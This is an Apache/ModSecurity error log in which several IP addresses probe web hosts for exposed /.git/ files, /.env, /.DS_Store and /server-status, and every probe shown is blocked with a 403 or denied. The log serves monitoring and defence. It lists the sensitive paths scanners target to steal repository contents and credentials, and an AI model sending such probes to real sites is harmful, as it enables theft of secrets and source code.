[Wed Nov 12 21:44:00.571473 2025] [:error] [pid 11035] [client 45.148.10.246:38826] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aRTxkLnAAM7f_REZ45Jn3AAAAAU"]
[Wed Nov 12 21:44:00.571667 2025] [:error] [pid 11035] [client 45.148.10.246:38826] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aRTxkLnAAM7f_REZ45Jn3AAAAAU"]
[Wed Nov 12 21:44:02.474376 2025] [:error] [pid 15565] [client 45.148.10.246:41734] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/orig_head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/ORIG_HEAD"] [unique_id "aRTxkpB1xiNM3Hn40hvRTAAAAAM"]
[Wed Nov 12 21:44:02.474606 2025] [:error] [pid 15565] [client 45.148.10.246:41734] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/ORIG_HEAD"] [unique_id "aRTxkpB1xiNM3Hn40hvRTAAAAAM"]
[Wed Nov 12 21:44:02.474799 2025] [:error] [pid 15565] [client 45.148.10.246:41734] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/ORIG_HEAD"] [unique_id "aRTxkpB1xiNM3Hn40hvRTAAAAAM"]
[Wed Nov 12 21:44:02.500121 2025] [:error] [pid 15565] [client 45.148.10.246:41734] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/objects/info/packs"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/objects/info/packs"] [unique_id "aRTxkpB1xiNM3Hn40hvRTQAAAAM"]
[Wed Nov 12 21:44:02.500340 2025] [:error] [pid 15565] [client 45.148.10.246:41734] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/objects/info/packs"] [unique_id "aRTxkpB1xiNM3Hn40hvRTQAAAAM"]
[Wed Nov 12 21:44:02.500558 2025] [:error] [pid 15565] [client 45.148.10.246:41734] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/objects/info/packs"] [unique_id "aRTxkpB1xiNM3Hn40hvRTQAAAAM"]
[Wed Nov 12 21:44:02.522690 2025] [:error] [pid 15565] [client 45.148.10.246:41734] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/index"] [unique_id "aRTxkpB1xiNM3Hn40hvRTgAAAAM"]
[Wed Nov 12 21:44:02.522900 2025] [:error] [pid 15565] [client 45.148.10.246:41734] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/index"] [unique_id "aRTxkpB1xiNM3Hn40hvRTgAAAAM"]
[Wed Nov 12 21:44:02.523116 2025] [:error] [pid 15565] [client 45.148.10.246:41734] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/index"] [unique_id "aRTxkpB1xiNM3Hn40hvRTgAAAAM"]
[Wed Nov 12 21:44:03.504486 2025] [:error] [pid 15565] [client 45.148.10.246:41734] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aRTxk5B1xiNM3Hn40hvRTwAAAAM"]
[Wed Nov 12 21:44:03.504698 2025] [:error] [pid 15565] [client 45.148.10.246:41734] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aRTxk5B1xiNM3Hn40hvRTwAAAAM"]
[Wed Nov 12 21:44:03.504913 2025] [:error] [pid 15565] [client 45.148.10.246:41734] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aRTxk5B1xiNM3Hn40hvRTwAAAAM"]
[Wed Nov 12 21:44:07.559506 2025] [:error] [pid 11158] [client 45.148.10.246:41736] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/packed-refs"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/packed-refs"] [unique_id "aRTxl1tgejOTJx5BSZKzkwAAABE"]
[Wed Nov 12 21:44:07.559736 2025] [:error] [pid 11158] [client 45.148.10.246:41736] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/packed-refs"] [unique_id "aRTxl1tgejOTJx5BSZKzkwAAABE"]
[Wed Nov 12 21:44:07.559925 2025] [:error] [pid 11158] [client 45.148.10.246:41736] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/packed-refs"] [unique_id "aRTxl1tgejOTJx5BSZKzkwAAABE"]
[Wed Nov 12 21:44:07.581987 2025] [:error] [pid 11158] [client 45.148.10.246:41736] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/fetch_head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/FETCH_HEAD"] [unique_id "aRTxl1tgejOTJx5BSZKzlAAAABE"]
[Wed Nov 12 21:44:07.582222 2025] [:error] [pid 11158] [client 45.148.10.246:41736] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/FETCH_HEAD"] [unique_id "aRTxl1tgejOTJx5BSZKzlAAAABE"]
[Wed Nov 12 21:44:07.582440 2025] [:error] [pid 11158] [client 45.148.10.246:41736] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/FETCH_HEAD"] [unique_id "aRTxl1tgejOTJx5BSZKzlAAAABE"]
[Wed Nov 12 21:44:07.669364 2025] [:error] [pid 11158] [client 45.148.10.246:41736] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/refs/heads/master"] [unique_id "aRTxl1tgejOTJx5BSZKzlQAAABE"]
[Wed Nov 12 21:44:07.669602 2025] [:error] [pid 11158] [client 45.148.10.246:41736] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/refs/heads/master"] [unique_id "aRTxl1tgejOTJx5BSZKzlQAAABE"]
[Wed Nov 12 21:44:07.669827 2025] [:error] [pid 11158] [client 45.148.10.246:41736] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/refs/heads/master"] [unique_id "aRTxl1tgejOTJx5BSZKzlQAAABE"]
[Wed Nov 12 21:44:10.401970 2025] [:error] [pid 12144] [client 45.148.10.246:41750] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/refs/heads/main"] [unique_id "aRTxmgm928Ldgdon2Eb6pAAAAAA"]
[Wed Nov 12 21:44:10.402213 2025] [:error] [pid 12144] [client 45.148.10.246:41750] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/refs/heads/main"] [unique_id "aRTxmgm928Ldgdon2Eb6pAAAAAA"]
[Wed Nov 12 21:44:10.402460 2025] [:error] [pid 12144] [client 45.148.10.246:41750] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/refs/heads/main"] [unique_id "aRTxmgm928Ldgdon2Eb6pAAAAAA"]
[Wed Nov 12 21:44:10.825057 2025] [:error] [pid 12144] [client 45.148.10.246:41750] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/remotes/origin/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/refs/remotes/origin/HEAD"] [unique_id "aRTxmgm928Ldgdon2Eb6pQAAAAA"]
[Wed Nov 12 21:44:10.825267 2025] [:error] [pid 12144] [client 45.148.10.246:41750] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/refs/remotes/origin/HEAD"] [unique_id "aRTxmgm928Ldgdon2Eb6pQAAAAA"]
[Wed Nov 12 21:44:10.825470 2025] [:error] [pid 12144] [client 45.148.10.246:41750] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/refs/remotes/origin/HEAD"] [unique_id "aRTxmgm928Ldgdon2Eb6pQAAAAA"]
[Wed Nov 12 23:37:10.469814 2025] [authz_core:error] [pid 24895] [client 209.97.180.8:49654] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Nov 12 23:37:11.394204 2025] [:error] [pid 24896] [client 209.97.180.8:49690] [client 209.97.180.8] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRUMF2B_etdha3D2RzU2dQAAAAI"]
[Wed Nov 12 23:37:11.394480 2025] [:error] [pid 24896] [client 209.97.180.8:49690] [client 209.97.180.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRUMF2B_etdha3D2RzU2dQAAAAI"]
[Wed Nov 12 23:37:11.394656 2025] [:error] [pid 24896] [client 209.97.180.8:49690] [client 209.97.180.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRUMF2B_etdha3D2RzU2dQAAAAI"]
[Wed Nov 12 23:37:11.494623 2025] [:error] [pid 24896] [client 209.97.180.8:49698] [client 209.97.180.8] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRUMF2B_etdha3D2RzU2dgAAAAI"]
[Wed Nov 12 23:37:11.494856 2025] [:error] [pid 24896] [client 209.97.180.8:49698] [client 209.97.180.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRUMF2B_etdha3D2RzU2dgAAAAI"]
[Wed Nov 12 23:37:11.495021 2025] [:error] [pid 24896] [client 209.97.180.8:49698] [client 209.97.180.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRUMF2B_etdha3D2RzU2dgAAAAI"]
[Wed Nov 12 23:37:11.591580 2025] [:error] [pid 24862] [client 209.97.180.8:49702] [client 209.97.180.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRUMF1R6aACIuxyivTjawwAAAAo"]
[Wed Nov 12 23:37:11.591819 2025] [:error] [pid 24862] [client 209.97.180.8:49702] [client 209.97.180.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRUMF1R6aACIuxyivTjawwAAAAo"]
[Wed Nov 12 23:37:11.591980 2025] [:error] [pid 24862] [client 209.97.180.8:49702] [client 209.97.180.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRUMF1R6aACIuxyivTjawwAAAAo"]
[Wed Nov 12 23:39:46.022836 2025] [:error] [pid 24895] [client 147.135.220.53:60208] [client 147.135.220.53] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRUMsmDYfsA-9MHTCLNkBwAAAAE"]
[Wed Nov 12 23:39:46.023181 2025] [:error] [pid 24895] [client 147.135.220.53:60208] [client 147.135.220.53] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRUMsmDYfsA-9MHTCLNkBwAAAAE"]
